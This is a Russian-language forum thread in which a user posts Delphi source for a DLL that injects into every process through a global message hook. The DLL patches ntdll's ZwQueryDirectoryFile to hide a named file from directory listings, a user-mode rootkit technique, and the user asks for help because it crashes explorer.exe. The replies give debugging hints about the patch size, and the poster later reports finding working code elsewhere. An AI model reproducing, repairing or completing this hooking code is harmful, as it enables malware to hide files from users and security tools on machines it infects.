Всем привет! Ниже код перехвата указанного процесса, по примеру ProcHide (писал Ms-Rem) с этого ресурса. Проблема: при запуске, сыпет ошибки чтения памяти и грохается explorer.exe Помогите разобраться. Код (Text): library Hide; uses Windows, NativeAPI,Dialogs,SysUtils; type OldCode = packed record One: dword; two: word; end; type FILE_DIRECTORY_INFORMATION = packed record NextEntryOffset: ULONG; Unknown: ULONG; CreationTime, LastAccessTime, LastWriteTime, ChangeTime, EndOfFile, AllocationSize: int64; FileAttributes: ULONG; FileNameLength: ULONG; FileName: PWideChar; end; PFILE_DIRECTORY_INFORMATION=^FILE_DIRECTORY_INFORMATION; type FILE_FULL_DIRECTORY_INFORMATION = packed record NextEntryOffset: ULONG; Unknown: ULONG; CreationTime, LastAccessTime, LastWriteTime, ChangeTime, EndOfFile, AllocationSize: int64; FileAttributes: ULONG; FileNameLength: ULONG; EaInformationLength: ULONG; FileName: PWideChar; end; type FILE_BOTH_DIRECTORY_INFORMATION = packed record NextEntryOffset: ULONG; Unknown: ULONG; CreationTime, LastAccessTime, LastWriteTime, ChangeTime, EndOfFile, AllocationSize: int64; FileAttributes: ULONG; FileNameLength: ULONG; EaInformationLength: ULONG; AlternateNameLength: ULONG; AlternateName: array [0..11] of WideChar; FileName: PWideChar; end; PFILE_BOTH_DIRECTORY_INFORMATION=^FILE_BOTH_DIRECTORY_INFORMATION; type FILE_NAMES_INFORMATION = packed record NextEntryOffset: ULONG; Unknown: ULONG; FileNameLength: ULONG; FileName: PWideChar; end; far_jmp = packed record PuhsOp: byte; PushArg: pointer; RetOp: byte; end; var JmpZwq: far_jmp; OldZwq: OldCode; PtrZwq: pointer; Function ZwQueryDirectoryFile(FileHandle: dword; Event: dword; ApcRoutine: pointer; ApcContext: pointer; IoStatusBlock: pointer; FileInformation: pointer; FileInformationLength: dword; FileInformationClass: dword; ReturnSingleEntry: bool; FileName: PUnicodeString; RestartScan: bool): NTStatus; stdcall; external 'ntdll.dll'; Function TrueZwQueryDirectoryFile(FileHandle: dword; Event: dword; ApcRoutine: pointer; ApcContext: pointer; IoStatusBlock: pointer; FileInformation: pointer; FileInformationLength: dword; FileInformationClass: dword; ReturnSingleEntry: bool; FileName: PUnicodeString; RestartScan: bool): NTStatus; stdcall; var Written: dword; begin WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Written); Result := ZwQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, FileInformationLength, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Written); end; Function NewZwQueryDirectoryFile(FileHandle: dword; Event: dword; ApcRoutine: pointer; ApcContext: pointer; IoStatusBlock: pointer; FileInformation: pointer; FileInformationLength: dword; FileInformationClass: dword; ReturnSingleEntry: bool; FileName: PUnicodeString; RestartScan: bool): NTStatus; stdcall; var Info, Prev: PFILE_BOTH_DIRECTORY_INFORMATION; begin Result := TrueZwQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, FileInformationLength, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); if (FileInformationClass = 3) and // FILE_BOTH_DIRECTORY_INFORMATION (Result = STATUS_SUCCESS) then begin info:=PFILE_BOTH_DIRECTORY_INFORMATION(FileInformation); //Вот тут где то и есть глюк.... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! while(Info^.NextEntryOffset > 0) do begin Prev := Info; Info := pointer(dword(Info) + Info^.NextEntryOffset); if lstrcmpiw(Info^.FileName, 'UUU.UUU') = 0 then Prev^.NextEntryOffset := Prev^.NextEntryOffset + Info^.NextEntryOffset; end; end; end; Procedure SetHook(); var Bytes: dword; begin PtrZwq := GetProcAddress(GetModuleHandle('ntdll.dll'), 'ZwQueryDirectoryFile'); ReadProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes); JmpZwq.PuhsOp := $68; JmpZwq.PushArg := @NewZwQueryDirectoryFile; JmpZwq.RetOp := $C3; WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Bytes); end; Procedure Unhook(); var Bytes: dword; begin WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes); end; // залепа Function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall; begin CallNextHookEx(0, Code, wParam, lparam); Result := 0; end; Procedure SetGlobalHookProc(); begin SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0); Sleep(INFINITE); end; // Procedure SetGlobalHook(); var hMutex: dword; TrId: dword; begin hMutex := CreateMutex(nil, false, 'ProcHideHook'); if GetLastError = 0 then CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId) else CloseHandle(hMutex); end; procedure DLLEntryPoint(dwReason: DWord); begin case dwReason of DLL_PROCESS_ATTACH: begin SetGlobalHook(); SetHook(); end; DLL_PROCESS_DETACH: begin Unhook(); end; end; end; begin DllProc := @DLLEntryPoint; DLLEntryPoint(DLL_PROCESS_ATTACH); end.
Отладчик зачем придумали ? Перехватывай у себя в процессе для удобства и работай с файлами. Так проще всего под олькой разглядеть где косяк.
SizeOf(OldCode) у меня под дизасмом твой код переписывает несколько метров кода. Что за сайзоф? явно размер задать никак, например 5 байт или 10?
Спасибо большое за помощь, на выше приведенной ветке я нашел рабочий код. Как сказанно там: "Klayd, вот это помог, спасибо большое! Respect и уважуха!"
